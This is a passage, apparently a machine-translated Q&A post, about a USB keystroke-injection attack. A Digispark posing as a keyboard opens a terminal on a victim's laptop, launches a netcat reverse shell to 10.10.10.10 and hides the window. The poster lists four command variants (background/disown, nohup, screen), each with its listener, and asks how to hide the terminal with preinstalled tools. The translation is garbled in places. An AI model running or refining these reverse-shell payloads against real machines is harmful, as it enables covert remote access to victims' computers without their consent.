场景:攻击者将充当键盘的 USB 插入受害者的笔记本电脑。有效负载打开一个终端,执行反向 shell 并隐藏终端。
问题:我在本地进行的测试(ubuntu 19.04,和 digispark as usb)如下:
一
航站楼 Anc -e /bin/bash 10.10.10.10 8888
B航站楼nc -vlp 8888
一切正常,我的 shell 在终端 B 上有提示,但终端 A 没有隐藏。那么在这种情况下它是没有用的。
二
航站楼 Anc -e /bin/bash 10.10.10.10 8888&; disown; exit
B航站楼nc -vlp 8888
终端 B 只是挂起,终端 A 被隐藏。无用。
三
航站楼 Anohup nc -e /bin/bash 10.10.10.10 8888&; exit
B航站楼nc -vlp 8888
终端 B 只是挂起,终端 A 被隐藏
四
终端A:我打开screen然后执行nc -e /bin/bash 10.10.10.10 8888,CTRL^A然后d,最后exit。
B航站楼nc -vlp 8888
使用screen一切正常(终端 B 收到一个工作外壳,终端 A 不可见)但我不想使用屏幕,因为默认情况下它没有安装。
问题:有没有办法(使用预装工具)隐藏终端,screen但效果相同?